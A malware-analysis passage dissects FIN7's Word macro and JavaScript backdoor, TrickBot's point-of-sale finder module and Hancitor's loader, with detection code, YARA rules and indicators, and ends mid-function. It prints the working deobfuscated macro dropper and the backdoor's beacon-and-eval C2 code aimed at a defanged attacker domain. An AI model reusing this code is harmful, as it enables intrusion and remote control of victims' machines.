FIN7 remains one of the most formidable financially motivated groups, known not only for large point-of-sale breaches (including the alleged latest one of the Burgerville restaurant point-of-sale network) but also for its stealthy persistence and sophisticated, persistent approach.
I highly recommend reading Morphisec’s blog titled “FIN7 Not Finished – Morphisec Spots New Campaign,” which details one of the latest FIN7 initial Word documents first-stage loaders with the deployed JavaScript backdoor.
It is also notable that they deploy a lightweight JavaScript backdoor communicating over HTTPS with domains that mimic Content Delivery Networks (CDNs), combined with search engine strings such as Google and Bing, creating bing-cdn[.]com, googleapi-cdn[.]com, & cisco-cdn[.]com.
Additionally, they still launch the JavaScript backdoor via “wscript.exe” renamed as “mses.exe”, with the script file itself called “errors.txt.”
In their backdoor code, they have the following hardcoded groups:

Hardcoded Groups
exchange
work2
ico

The following MITRE Enterprise ATT&CK attack patterns are observed with the FIN7 campaign:

+ Spearphishing Attachment - T1193
+ Scripting - T1064
+ Masquerading - T1036
+ Deobfuscate/Decode Files or Information - T1140
+ Data Obfuscation - T1001

II. Malicious Microsoft Word Document First-Stage Macro
Essentially, the Microsoft Word document loaders do not rely on any exploits but simply require a social-engineering trick to “Enable Macros.” Notably, to avoid process whitelisting of wscript, the macro logic copies the original JavaScript execution engine “wscript.exe” as “mses.exe” into %LOCALAPPDATA%, and it leverages a possible anti-analysis routine that checks the system drive size via GetDrive.TotalSize for a value of more than 2456 bytes, possibly to thwart sandboxes.

The actual obfuscated JavaScript backdoor is stored in a UserForm object and is written to disk as “errors.txt” in “%TEMP%”. The final execution of the backdoor is performed via the following command:

%LOCALAPPDATA%\mses.exe //b /e:jscript %temp%\errors.txt

Once it is done, the document macro runs a message box displaying “Decryption error” via MsgBox(“Decryption error”).

It is notable that the decryption message is also part of the document social engineering ruse “to decrypt document” as well as the subsequent “Decryption Error” coupled with the execution of “errors.txt” creates a plausible yet well-thought scenario of allowing possible “error” paths due to document errors.

The full cleaned macro code is as follows:

//////////////////////////////////////////////
/////// FIN7 Deobfuscated Word Macro //////////
//////////////////////////////////////////////
Set CreateObjectScripting = CreateObject("Scripting.FileSystemObject")
Set CreateObjectWScriptShell = CreateObject("WScript.Shell")
SystemDrivePath = CreateObjectWScriptShell.ExpandEnvironmentStrings("%SystemDrive%")
Set GetDrivePath = CreateObjectScripting.GetDrive(SystemDrivePath)
DriveSize = GetDrivePath.TotalSize
' Possible anti-sandbox check on the size of the system drive
If DriveSize > 2456 Then
TEMPPathErrorsTxt = CreateObjectWScriptShell.ExpandEnvironmentStrings("%temp%") _
& "\errors.txt"
' The obfuscated JavaScript backdoor is stored in the UserForm caption
FormCaptionHolder = UserForm1.NameForm.Caption
Set CreateFileHolder = CreateObjectScripting.CreateTextFile(TEMPPathErrorsTxt)
CreateFileHolder.WriteLine FormCaptionHolder
CreateFileHolder.Close
GetPathtoMsesExe = CreateObjectWScriptShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") _
& "\mses.exe"
' Copy of the script host under a different name
FileCopy "C:\Windows\System32\wscript.exe", GetPathtoMsesExe
Shell "%LOCALAPPDATA%\mses.exe" & " //b /e:jscript " & "%temp%\errors.txt", False
End If

Additionally, the second document contains the same exact reference to mysterious “cesar.exe” as detailed by Nick Carr.
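The chain above (wscript.exe copied under a new name, then run in batch mode with the JScript engine forced on a .txt file from a Word parent) leaves three independent telemetry signals. The added Python example below (my own code, not from the post or the malware) encodes them as rules over process-creation events; the field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, ParentImage), and the two sample events are constructed, one reproducing the macro's chain and one a benign logon script.

```python
# Added example: flag the FIN7 macro's execution chain in process-creation telemetry.
# Not part of the original post. Field names follow Sysmon Event ID 1; sample events
# are constructed.
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# "//b /e:jscript <something>.txt": batch mode, forced JScript engine, script in a .txt file
JSCRIPT_TXT_RE = re.compile(r"/e:jscript\s+\S*\.txt\b", re.IGNORECASE)


def match_rules(event: dict) -> list:
    """Return the names of the rules an event triggers (empty list if none)."""
    image = ntpath.basename(event.get("image", "")).lower()
    original = event.get("original_file_name", "").lower()
    parent = ntpath.basename(event.get("parent_image", "")).lower()
    cmdline = event.get("command_line", "")
    hits = []
    # 1. A script host running under a different file name (wscript.exe copied to mses.exe).
    if original in SCRIPT_HOSTS and image != original:
        hits.append("renamed_script_host")
    # 2. JScript engine forced on a .txt file (the errors.txt trick), whatever the host is called.
    if JSCRIPT_TXT_RE.search(cmdline):
        hits.append("jscript_engine_on_txt")
    # 3. Any script host spawned by Word, renamed or not.
    if parent == "winword.exe" and (original in SCRIPT_HOSTS or image in SCRIPT_HOSTS):
        hits.append("office_spawned_script_host")
    return hits


SAMPLE_EVENTS = [
    {   # the chain from the macro above (paths constructed)
        "image": r"C:\Users\alice\AppData\Local\mses.exe",
        "original_file_name": "wscript.exe",
        "command_line": r"C:\Users\alice\AppData\Local\mses.exe //b /e:jscript "
                        r"C:\Users\alice\AppData\Local\Temp\errors.txt",
        "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # benign logon script run by the real host
        "image": r"C:\Windows\System32\wscript.exe",
        "original_file_name": "wscript.exe",
        "command_line": r"wscript.exe \\fileserver\netlogon\logon.vbs",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]


def scan(events: list) -> list:
    """Return (index, hits) for every event that triggers at least one rule."""
    results = []
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, hits)
```

Rule 1 depends on the PE's OriginalFileName surviving the copy, which it does since FileCopy does not touch the version resource; rule 2 works even if the host is renamed to something other than mses.exe.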

III. Deobfuscated Lightweight JavaScript Backdoor
The JavaScript contains five functions as follows:

Function Name Description
“main” main function
“id” generate unique machine ID based on MAC address and DNS domain
“crypt_controller” control decryptor and encryptor function
“get_path” build path URL based on pre-configured paths
“send_data” send data request to the server
A. “main”
The “main” function initiates a variable “ncommand”, which holds the result of the “send_data” function called with the arguments “request”, “action=get_command”, and true.
//////////////////////////////////////////////
/////// JS Backdoor "main" Function /////////
//////////////////////////////////////////////
function main() {
var ncommand = "";
ncommand = send_data("request", "action=get_command", true);
if (ncommand !== "no") {
try {
eval(crypt_controller("decrypt", ncommand));
} catch (e) {}
}
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
WScript.Sleep(random_knock);
main();
}

If ncommand does not equal “no,” it runs eval on the result of the “crypt_controller” function called with the arguments “decrypt” and ncommand.
The backdoor uses the variable “random_knock,” which equals 120000 plus (Math.floor(Math.random() * 16001) - 5000) milliseconds; it is passed to WScript.Sleep, after which main runs again.
The unique machine ID is generated via the command running Date with the getUTCMilliseconds() parameters. It also deletes itself via GetFile.Type == “Application” and length == 10 and deleteFile via ActiveXObject.
B. “crypt_controller”

The crypt_controller function accepts two parameters of type and request.
//////////////////////////////////////////////
// JS Backdoor "crypt_controller" Function //
//////////////////////////////////////////////
function crypt_controller(type, request) {
var encryption_key = "";
if (type === "decrypt") {
request = decodeURIComponent(request);
var request_split = request.split(")*(");
request = request_split[0];
encryption_key = request_split[1].split("");
} else {
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split("");
}
var output = [];
for (var i = 0; i < request.length; i++) {
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
output.push(String.fromCharCode(charCode));
}
var result_string = output.join("");
if (type === "encrypt") {
result_string = result_string + ")*(" + encryption_key.join("");
result_string = encodeURIComponent(result_string);
}
return result_string;
}
a. If the type parameter equals “decrypt”, the request is first processed via decodeURIComponent and then split on the separator “)*(”; the first element is the encrypted body and the second element ([1]) is the encryption_key, split into individual characters. Otherwise (the “encrypt” case), a random four-digit key is generated via (Math.floor(Math.random() * 9000) + 1000).toString().split(“”);.
The decoding routine is a simple XOR loop: each character of the request is XORed with the key character at position i % key length, and the result_string is assembled via .join:

var output = [];
for (var i = 0; i < request.length; i++) {
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
output.push(String.fromCharCode(charCode));
}

b. If the type parameter equals “encrypt”, the result_string is appended with “)*(” and the key, and then passed to encodeURIComponent.
C. “id”

The ID function executes a simple WMI query as follows retrieving and parsing for MAC address and DNS domain:

"select * from Win32_NetworkAdapterConfiguration where ipenabled = true"
///////////////////////////////
// JS Backdoor "id" Function ///
///////////////////////////////
function id() {
var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
var lItems = new Enumerator(lrequest);
for (; !lItems.atEnd(); lItems.moveNext()) {
var mac = lItems.item().macaddress;
var dns_hostname = lItems.item().DNSHostName;
if (typeof mac === "string" && mac.length > 1) {
if (typeof dns_hostname !== "string" && dns_hostname.length < 1) {
dns_hostname = "Unknown";
} else {
for (var i = 0; i < dns_hostname.length; i++) {
if (dns_hostname.charAt(i) > "z") {
dns_hostname = dns_hostname.substr(0, i) + "_" + dns_hostname.substr(i + 1);
}
}
}
return mac + "_" + dns_hostname;
}
}
}
Finally, the value is concatenated in the format of mac + “_” + dns_hostname.
D. “get_path”
The function takes no parameters and builds the request URL from a random element of the “pathes” array and a random element of the “files” array, as follows:
//////////////////////////////////////
// JS Backdoor "get_path" Function ///
//////////////////////////////////////
function get_path() {
var pathes = ["images", "image", "content", "fetch", "cdn"];
var files = ["create_logo", "get_image", "create_image", "show_ico", "show_png", "show_jpg"];
var path = pathes[Math.floor(Math.random() * pathes.length)] + "/" + files[Math.floor(Math.random() * files.length)];
return "hxxps://bing-cdn[.]com/" + path;
}
For example,
hxxps://bing-cdn[.]com/fetch/show_jpg?request=page
hxxps://bing-cdn[.]com/images/get_image?request=page
hxxps://bing-cdn[.]com/image/show_ico?request=page
E. “send_data”

The function accepts three parameters: type, data, and the boolean crypt.
//////////////////////////////////////
// JS Backdoor "send_data" Function //
//////////////////////////////////////
function send_data(type, data, crypt) {
try {
var http_object = new ActiveXObject("MSXML2.ServerXMLHTTP");
if (type === "request") {
http_object.open("POST", get_path() + "?request=page", false);
data = "ytqikulpemsi=" + crypt_controller("encrypt", "group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=" + uniq_id + "&id=" + id() + "&" + data);
} else {
http_object.open("POST", get_path() + "?request=content&id=" + uniq_id, false);
if (crypt) {
data = crypt_controller("encrypt", data);
}
}
http_object.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
http_object.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
http_object.setOption(2, 13056);
http_object.send(data);
return http_object.responseText;
} catch (e) {
return "no";
}
}
a. If type === “request”, the backdoor forms the POST request to the get_path() URL ending with “?request=page.” The POST body consists of the hardcoded field name “ytqikulpemsi=” followed by the output of crypt_controller called with “encrypt” and the string “group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=” + uniq_id + “&id=” + the return value of id() + “&” + data.
b. Otherwise, the request goes to the get_path() URL ending with “?request=content&id=” + uniq_id, and the data is encrypted only if crypt is true:
http_object.open(“POST”, get_path() + “?request=content&id=” + uniq_id, false);
The “main” function calls send_data with the parameter “action=get_command”, so before encryption the body has the following form:
ytqikulpemsi=group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=….&id=…

An example of the decoded full path is as follows:

group=work2&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=208&id=00:0C:29:B4:CE:DC_WIN_NAME&action=get_command
An example of the encoded data (four-digit XOR encryption key):

ytqikulpemsi=TB_BC%0DUOPXQYTU%16EG%0D%11%40USEVD%0DQTXUSU%04%03S%40cvA%5E%03%11GY%5DR%0E%01%05%07%03%11FYT%0A%07%07%08%11ZT%0D%07%03%0At%09%02%09%0Dq%04%0Atv%0Attlgyy%1Eqr%07%05%03%09xe%04%09e%15QSCZ_%5E%0ATUDhP_%5DZR%5ET)*(3007
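The crypt_controller scheme described above (XOR against a four-digit key that travels in the message after “)*(”, then URL-encoding) and the send_data beacon body, re-implemented in Python as an added analyst example so captured form bodies can be decoded offline; this is not code from the backdoor or the original post, and the beacon string and the key 3007 used below are constructed from the formats shown:

```python
"""Analyst re-implementation of the backdoor's crypt_controller scheme.

Added example for this write-up (not the backdoor's code): the plaintext is
XORed byte-wise with a four-digit ASCII key, the key is appended after the
")*(" separator, and the whole string is passed through encodeURIComponent.
Decryption reverses this, so the key is always recoverable from the message.
"""
from urllib.parse import quote, unquote

SEPARATOR = ")*("
FORM_FIELD = "ytqikulpemsi"   # hardcoded form field name used by send_data
JS_SAFE = "-_.!~*'()"         # characters encodeURIComponent leaves unescaped


def xor_with_key(text: str, key: str) -> str:
    """XOR every character of text with the key character at i % len(key)."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def js_encrypt(plaintext: str, key: str) -> str:
    """Mirror of crypt_controller("encrypt", ...) with an explicit key
    (the backdoor picks a random 1000..9999 key at runtime)."""
    return quote(xor_with_key(plaintext, key) + SEPARATOR + key, safe=JS_SAFE)


def js_decrypt(encoded: str) -> str:
    """Mirror of crypt_controller("decrypt", ...): URL-decode, split off the key, XOR."""
    body, _, key = unquote(encoded).partition(SEPARATOR)
    if not key.isdigit():
        raise ValueError("no trailing numeric key after the )*( separator")
    return xor_with_key(body, key)


def decode_beacon(form_body: str) -> dict:
    """Decode a captured POST body 'ytqikulpemsi=<encrypted>' into its parameters."""
    field, _, value = form_body.partition("=")
    if field != FORM_FIELD:
        raise ValueError("not a beacon body for this backdoor")
    params = {}
    for pair in js_decrypt(value).split("&"):
        name, _, val = pair.partition("=")
        params[name] = val
    return params


# Constructed beacon in the format described above (MAC and hostname are sample values)
SAMPLE_PLAINTEXT = ("group=exchange&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=208"
                    "&id=00:0C:29:B4:CE:DC_WIN_NAME&action=get_command")

if __name__ == "__main__":
    wire = FORM_FIELD + "=" + js_encrypt(SAMPLE_PLAINTEXT, "3007")
    print(wire)
    print(decode_beacon(wire))
```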
IV. Yara Signature:
rule apt_win32_possible_fin7_doc {
meta:
description = "Detects possible FIN7 first-stage initial doc"
author = "@VK_Intel"
date = "2018-11-23"
hash1 = "f5f8ab9863dc12d04731b1932fc3609742de68252c706952f31894fc21746bb8"
hash2 = "6e1230088a34678726102353c622445e1f8b8b8c9ce1f025d11bfffd5017ca82"
strings:
$font = "{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil MS Sans S" fullword wide
$userform = "Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1 " fullword ascii
$uniq_string = "C:\\Program Files\\Microsoft Office\\Office14\\MSWORD.OLB" fullword ascii


$x0 = "C:\\Users\\Administrator\\Downloads\\InkEd.dll" fullword ascii
$x1 = "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\2\\Word8.0\\INKEDLib.exd" fullword ascii
$x2 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSO.DLL" fullword ascii
condition:
uint16(0) == 0xcfd0 and
filesize < 2000KB and ( 1 of ($x*) and $font and ( $uniq_string or $userform ) )
or ( all of them )
}

V. Indicators of Compromise: Domains

hxxps://googleapi-cdn[.]com
hxxps://bing-cdn[.]com
hxxps://cisco-cdn[.]com/

Let’s Learn: Introducing Latest TrickBot Point-of-Sale Finder Module

Goal: Analyze the latest TrickBot point-of-sale finder “psfin32” reconnaissance module, which hunts for point-of-sale related services, software, and machines via the Lightweight Directory Access Protocol (LDAP).
Source:
Unpacked TrickBot psfin32 Module 32-Bit (x86) (MD5: 4fce2da754c9a1ac06ad11a46d215d23)
Outline

I. Background
II. Decoded TrickBot Point-of-Sale Finder “psfin32” Module 32-Bit (x86)
III. TrickBot Point-of-Sale Finder Module vs DomainGrabber Module: Code Analysis
IV. TrickBot Point-of-Sale Finder Module LDAP Analysis
V. TrickBot Point-of-Sale Finder Module POST Command
VI. Yara Signature

I. Background
This is not the first time the TrickBot development group has leveraged LDAP; they also developed a DomainGrabber module specifically to harvest sensitive domain controller information, as detailed earlier. The group behind the TrickBot malware development remains one of the most resourceful in the e-crime ecosystem, continuously releasing various modules (for example, the password grabber “pwgrab32Dll” on October 19, 2018). The module itself does not steal any point-of-sale data but is rather used to profile corporate machines of interest with possible point-of-sale devices. This module arrives just in time for the holiday shopping season, highlighting the group's interest in exploring possible point-of-sale breaches. The question is: What point-of-sale malware would the group behind TrickBot deploy on identified machines of interest, and/or would they auction this access to another group? This question is yet to be answered.
II. Decoded TrickBot Point-of-Sale Finder “psfin32” Module 32-Bit (x86) 

This tiny “psfin32” module DLL with the size of 18.13 KB (18568 bytes), compiled on Monday, November 5, 09:00:47 2018 UTC, is originally called “dll[.]dll.” The module itself consists of only 24 functions.
The decoded Trickbot “pfin32Dll” module contains the usual Trickbot export functions:

Control
FreeBuffer
Release
Start

III. TrickBot Point-of-Sale Finder Module vs DomainGrabber Module: Code Analysis

The latest module visually shows a lot of similarity to their previous DomainGrabber module. Pseudo source-code level analysis reveals that the code contains 6 partial function matches (including perfect match and strongly connected components) and 17 unreliable function matches (including same MD index and constants, strongly connected components, similar small pseudo-code, strongly connected components small-primes-product, and loop count). By and large, the pseudo source-code analysis reveals that the new module heavily borrows from the earlier DomainGrabber code and was likely coded by the same developer(s).
IV. TrickBot Point-of-Sale Finder Module LDAP Analysis
This TrickBot module was programmed using the Active Directory Service Interfaces (ADSI) APIs to search LDAP for objects possibly linked to point-of-sale related services, software, and machines. To learn more about the specific ADsOpenObject access and the IADsContainer interface, please refer to the DomainGrabber post.
The LDAP provider is used to access Active Directory Domain Services. The binding string takes the form “GC://”, binding to the root of the namespace; “GC:” uses the LDAP provider to bind to the Global Catalog service to execute queries.
The module queries the DOMAIN Global Catalog for the following:

COMPUTERS
USERS
GROUPS
SITES
OUs

The point-of-sale key terms of interest are as follows:

*POS*
*REG*
*CASH*
*LANE*
*STORE*
*RETAIL*
*BOH*
*ALOHA*
*MICROS*
*TERM*

V. TrickBot Point-of-Sale Finder Module POST Command
Once the information is harvested, the “Log” file with the collected data is posted to the TrickBot “Dpost” servers via the “/%s/%s/90” command path.

As part of the exported “Control” function, the module forms the upload and communicates with the next-layer network via the module network path ending in …///90. The /90 ending is used for POST requests, with the content in the following three unique formats:

A. Content-Disposition: form-data; name="proclist"
B. Content-Disposition: form-data; name="sysinfo"
C. Content-Type: multipart/form-data; boundary=Arasfjasu7

The unique value “Arasfjasu7” appears to be a marker/separator for the LDAP query collection upload to split the harvested information.
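A detection pass over HTTP proxy log lines for the upload traits described in this section (POST to the “/%s/%s/90” Dpost path, the “Arasfjasu7” boundary, the “proclist”/“sysinfo” field names), as an added example that is not TrickBot code or the original post's; the log line format and every sample line are constructed for the example:

```python
"""Added detection example, not TrickBot code and not from the original post.

Scores HTTP proxy log lines against the psfin32 upload traits described above:
a POST to the "/%s/%s/90" Dpost path, multipart form data using the boundary
"Arasfjasu7", and the "proclist"/"sysinfo" form field names. The log line
format and all sample lines below are constructed for this example.
"""
import re
from typing import Optional

# Constructed format: <timestamp> <src_ip> <METHOD> <url> <status> "<content-type>" [body excerpt]
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) '
    r'"(?P<ctype>[^"]*)"(?: (?P<body>.*))?$'
)
# "/%s/%s/90": two path components filled in by the module, then the 90 command
DPOST_PATH_RE = re.compile(r"^https?://[^/]+/[^/]+/[^/]+/90$")
BOUNDARY = "Arasfjasu7"
FORM_FIELDS = ('name="proclist"', 'name="sysinfo"')


def score_line(line: str) -> Optional[dict]:
    """Return the matching traits for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    body = f["body"] or ""
    reasons = []
    if f["method"] == "POST" and DPOST_PATH_RE.match(f["url"]):
        reasons.append("dpost_path_90")
    if BOUNDARY in f["ctype"] or BOUNDARY in body:
        reasons.append("arasfjasu7_boundary")
    if any(field in body for field in FORM_FIELDS):
        reasons.append("trickbot_form_field")
    if not reasons:
        return None
    return {"src": f["src"], "url": f["url"], "reasons": reasons}


def find_uploads(lines):
    """Run score_line over a log and keep only the lines that matched something."""
    return [hit for hit in map(score_line, lines) if hit]


# Constructed sample log: one benign upload, one full psfin32 upload, one partial match
SAMPLE_LOG = [
    '2018-11-07T10:01:02Z 10.0.0.5 POST https://files.example.net/api/upload 200 '
    '"multipart/form-data; boundary=----WebKitFormBoundaryAbc123" '
    'Content-Disposition: form-data; name="file"',
    '2018-11-07T10:05:44Z 10.0.0.23 POST http://203.0.113.10/GROUPTAG/CLIENTID/90 200 '
    '"multipart/form-data; boundary=Arasfjasu7" '
    'Content-Disposition: form-data; name="proclist"',
    '2018-11-07T10:06:10Z 10.0.0.23 POST http://203.0.113.10/gate.php 200 '
    '"multipart/form-data; boundary=Arasfjasu7" '
    'Content-Disposition: form-data; name="sysinfo"',
]

if __name__ == "__main__":
    for hit in find_uploads(SAMPLE_LOG):
        print(hit)
```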
VI. Yara Signature

import "pe"

rule crime_win32_trickbot_psfin32_dll {
meta:
author = "@VK_Intel"
reference = "Detects TrickBot Point-of-Sale Finder Module"
date = "2018-11-07"
hash1 = "f82d0b87a38792e4572b15fab574c7bf95491bf7c073124530f05cc704c1ee96"
strings:
$s0 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" fullword wide
$s1 = "Dpost servers unavailable" fullword ascii
$s2 = "USERS:" fullword wide
$s3 = "*POS*" fullword wide
$s4 = "/%s/%s/90" fullword wide
$s5 = "DOMAIN GC" fullword wide
$s6 = "*MICROS*" fullword wide
$s7 = "(&(objectCategory=person)(sAMAccountName=%s))" fullword wide

$ldap_gc_pos_queryportion = { 85 f6 0f ?? ?? ?? ?? ?? 8b ?? ?? 8d ?? ?? ?? ?? ?? 6a 04 c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 8b ?? 52 50 ff ?? ?? 85 c0 0f ?? ?? ?? ?? ?? 68 84 45 00 10 57 e8 ?? ?? ?? ?? 68 a0 45 00 10 57 e8 ?? ?? ?? ?? 68 24 46 00 10 57 e8 ?? ?? ?? ?? ba 40 46 00 10 b9 e0 44 00 10 e8 ?? ?? ?? ?? 50 68 4c 46 00 10 57 e8 ?? ?? ?? ??}

condition:
( uint16(0) == 0x5a4d and
filesize < 50KB and
pe.imphash() == "13c48c2a1eaa564e28ee00ed7cd0fc0f" and pe.exports("Control") and pe.exports("Release") and
( all of them )
) or ( $ldap_gc_pos_queryportion and 5 of ($s*) )
}

Let’s Learn: In-Depth Reversing of Hancitor Dropper/Loader: 2016 vs 2018 Malware Progression

Goal: Analyze the latest Hancitor variant (build “25xce10”) to determine dropper and downloader malware progression in time from 2016 to the latest version in 2018.
Source:
Original Packed Hancitor Loader 32-Bit (x86) (MD5: 0cabdc2d4b83cd8b210fd2bd15d54bdc)
Unpacked Hancitor Dropper & Loader 32-Bit (x86) (MD5: fc7748f302a1566c27568e094873817a)

Outline

I. Background
II. Original Packed Hancitor Loader 32-Bit (x86)
III. Unpacked Hancitor Dropper & Loader 32-Bit (x86)
A. Hancitor MainThreadProcessor
B. Hancitor SystemInfo Generation
C. Hancitor RC4 CryptDecrypt Routine
IV. Yara Signature

I. Background
The group behind Hancitor distribution campaigns remains one of the more resourceful and sophisticated cybercrime loader-as-a-service groups, delivering various payloads – ranging from simple credential stealers to point-of-sale and banking malware variants (from Pony Stealer, EvilPony Stealer, AZORult Stealer to Neverquest Banker, Panda Banker, Gozi ISFB Banker, and Danabot Banker).
One of the most interesting kinds of malware analysis is tracking malware development progression over time at the source-code level. I highly recommend reading the article on Hancitor titled “A Closer Look At Hancitor” written by Nick Hoffman and Jeremy Humble. I will use the malware sample from this article to compare against one of the latest Hancitor variants (h/t to @malware_traffic for the latest sample). Additionally, I recommend reading @benkow_’s blog titled “Hancitor Panel Overview” to learn more about the Hancitor panel.
II. Original Packed Hancitor Loader 32-Bit (x86)

The Hancitor malspam email chain included the first-stage loader as a malicious Microsoft Word document requiring a victim to enable macros to view the fax message as if it is from a legitimate company HelloFax.

III. Unpacked Hancitor Dropper & Loader 32-Bit (x86)

By and large, while the group behind the malware is rather experienced and persistent, the Hancitor dropper remains a simple and unsophisticated dropper and loader that has seen little development since 2016. Notable examples of this limited development and adjustment include: its reliance on ANSI API calls as well as the unsophisticated WriteProcessMemory injection method; a modified %TEMP% run method with the logic joined into the CreateProcessA function rather than kept as a separate function; the absence of the Winhost32.exe check logic and its derivative functions; additional error checking on CreateProcessA and exception handling; an improved parser function before the WriteProcessMemory injection; a joined injection function; no deletion logic; and a different initial and entry function.
The reviewed 2016 Hancitor dropper version contains 66 functions with a size of 20.00 KB (20480 bytes), while the latest 2018 Hancitor version consists of 51 functions with a size of 20.50 KB (20992 bytes). Pseudo source-code level analysis reveals that the code contains 8 partial function matches (including perfect match, same MD index and constants, strongly connected components, and similar small pseudo-code) and 34 unreliable function matches (including perfect match, same MD index and constants, strongly connected components, similar small pseudo-code, strongly connected components small-primes-product, and loop count).
The notable differences include the absence of the connectivity check in the latest version. For example, the 2016 version tried to see if it could reach google.com as part of its logic. Moreover, the 2016 version did not contain the RC4 decryption with the RtlDecompressBuffer API call to decode the next stage, as opposed to the 2018 variant. The “e” command appears to be new relative to the 2016 version.
A. Hancitor MainThreadProcessor
In this case, I am looking into the Hancitor build “25xce10”. The Hancitor malware receives multiple commands that it parses and executes as additional steps. A command letter is separated from its payload by “:”, and multiple URLs, for example, are separated with the “|” symbol.

Hancitor has logic to parse the following commands:

Command   Description
"r"       Download and execute .DLL or .EXE
"l"       Download and execute .EXE in separate thread (arg=1)
"e"       Download and execute .EXE in separate thread (arg=0)
"b"       Download and inject code into svchost.exe
"d"       N/A (not implemented; used to delete itself in older version)
"c"       N/A (not implemented)
"n"       N/A (not implemented)

The full pseudo-coded Hancitor main command processor function is as follows:
////////////////////////////////////////////////////////////////////////////////
//////////// Hancitor MainThreadProcessor //////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
signed int __cdecl HancitorMainCommandProcessor(int cmd, signed int *a2)
{
signed int v3;
signed int result;

// the command letter is at cmd[0]; it must be followed by ':' at cmd[1]
if ( *(_BYTE *)(cmd + 1) == ':' )
{
switch ( *(_BYTE *)cmd )
{
case 'r':
// "r" command -> download and execute .DLL or .EXE
// if .DLL -> via rundll32.exe, $s,f1 in %TEMP% or if .EXE -> CreateProcessA

*a2 = RtlDecompressBuffer_GetTemp_rundll32(cmd + 2);
return 1;
case 'l':
// "l" command -> download and execute .EXE in separate thread (arg=1)
// check for "MZ" header, call VirtualAlloc and/or dynamic API resolution

v3 = RtlDecompress_CreateThread(cmd + 2, 1);
goto LABEL_5;
case 'e':
// "e" command -> download and execute .EXE in separate thread (arg=0)
// check for "MZ" header, call VirtualAlloc and/or dynamic API resolution

v3 = RtlDecompress_CreateThread(cmd + 2, 0);

LABEL_5:
*a2 = v3;
result = 1;
break;
case 'b':
// "b" command -> download and inject code into svchost.exe
// check for "MZ" header, call allocate memory and write code into the memory

*a2 = RtlDecompressBuffer_Call_svchost_injection(cmd + 2);
result = 1;
break;
case 'n':
// "n" command -> no processor for this command

*a2 = 1;
result = 1;
break;
default:
goto LABEL_9;
}
}
else
{
LABEL_9:
result = 0;
}
return result;
}

B. Hancitor SystemInfo Generation
By and large, the Hancitor malware collects generic information regarding the host that includes various information filled into the formatted collector string:

GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32|64)

The shortened pseudo-coded C++ Hancitor SystemInfo function is as follows:
////////////////////////////////////////////////////////////////////////////////
//////////// Hancitor SystemInfo ///////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
signed int __cdecl SystemInfo(int a1, int a2, int a3)
{
version_ret = GetVersion();
bot_id = qword_1E6178;
win_version = version_ret;
build_bot_1 = HIDWORD(qword_1E6178);
if ( !qword_1E6178 )
{
LODWORD(v7) = Adapteers_GetWindowsDirectoryA();
build_bot_1 = HIDWORD(v7);
bot_id = v7;
qword_1E6178 = v7;
}
GetComputerNameA_0((signed int)&comp_name);
ExternalAPI_resolution(v8, bot_id, (int)&external_ip);
win_version_1 = (unsigned __int8)win_version;
check_if_x64 = GetNativeSystemInfo() == 1;
comp_name_info = pbData_1;
if ( check_if_x64 )
{
if ( !pbData_1 )
{
pbData_1 = GetProcessHeap_0(0x2000);
func1(pbData_1, (char *)&unk_1E4018, 0x2000);
Crypto_func(pbData_1, 0x2000, (int)&pbData_key, 8);
comp_name_info = pbData_1;
}
wsprintfA(
&formatted_systeminfo,
"GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)",
bot_id,
build_bot_1,
comp_name_info,
&comp_name,
&external_ip,
win_version_1,
HIBYTE(win_version));
}
